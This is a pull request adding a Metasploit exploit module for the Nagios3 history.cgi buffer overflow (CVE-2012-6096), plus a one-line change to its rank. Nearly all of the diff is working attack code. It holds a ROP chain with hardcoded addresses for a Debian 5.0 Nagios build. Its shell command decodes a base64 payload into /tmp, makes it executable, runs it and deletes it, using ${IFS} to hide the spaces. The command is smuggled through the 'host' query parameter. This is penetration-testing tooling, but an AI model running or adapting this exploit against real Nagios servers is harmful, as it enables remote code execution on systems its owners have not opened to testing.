### PR TITLE
Added exploit for nagios3 history.cgi Buffer Overflow (CVE-2012-6096)

### DIFF
--- a/modules/exploits/linux/http/nagios_history.rb
+++ b/modules/exploits/linux/http/nagios_history.rb
@@ -1,0 +1,77 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = AverageRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Nagios history.cgi Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack buffer overflow in history.cgi of Nagios3.
+			},
+			'Author'         =>
+				[
+					'temp66', # Discovery
+					'blasty', # Exploit
+					'Daniele Martini <cyrax[at]pkcrew.org>' # Metasploit module
+				],
+			'License'        => BSD_LICENSE,
+			'References'     =>
+				[
+					['CVE', '2012-6096'],
+					['URL','http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0108.html'],
+
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 200,
+					'DisableNops' => true,
+				},
+			'Platform'       => 'linux',
+			'Arch'           => ARCH_X86,
+			'Targets'        =>
+				[
+					['Debian 5.0 Nagios 3.0.6-4~lenny2',
+						{
+						'smashlen'=>0xc37,
+						'unescape'=>0x804b620,
+						'popret'=>0x8048fe4,
+						'hostbuf'=>0x80727a0,
+						'systemplt'=>0x8048c7c
+						}
+					],
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Dec 9 2012'))
+
+		register_options([
+			OptString.new('TARGETURI', [true, 'The URI path to history.cgi', '/nagios3/cgi-bin/history.cgi'])
+		], self.class)
+	end
+
+	def exploit
+		tempfile=rand_text_alpha(4)
+		b64elf=Rex::Text.encode_base64(payload.encoded_exe)
+		cmd = "echo #{b64elf}"
+		cmd << "|base64 -d|tee /tmp/#{tempfile} |chmod +x /tmp/#{tempfile};/tmp/#{tempfile};rm -f /tmp/#{tempfile}"
+
+		cmd.gsub!(" ","${IFS}")
+		rop=[
+			[target['unescape']].pack('V'),
+			[target['popret']].pack('V'),
+			[target['hostbuf']].pack('V'),
+			[target['systemplt']].pack('V'),
+			[0x41424344].pack('V'),
+			[target['hostbuf']].pack('V')
+		]
+		pad=rand_text_alpha(target['smashlen']-cmd.length)
+		param="host="+Rex::Text.uri_encode("#{cmd}#{pad}#{rop.join}")
+		uri = normalize_uri(target_uri.path) << "?#{param}"
+		res = send_request_raw({'uri'=>uri})
+		handler
+	end
+end

--- a/modules/exploits/linux/http/nagios_history.rb
+++ b/modules/exploits/linux/http/nagios_history.rb
@@ -1,7 +1,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = AverageRanking
+	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpClient
 	include Msf::Exploit::EXE


### PR DESCRIPTION
I ported blasty exploit for nagios3 history.cgi buffer overflow to metasploit.

You can try it on debian 5.0 with package nagios3  3.0.6-4~lenny2
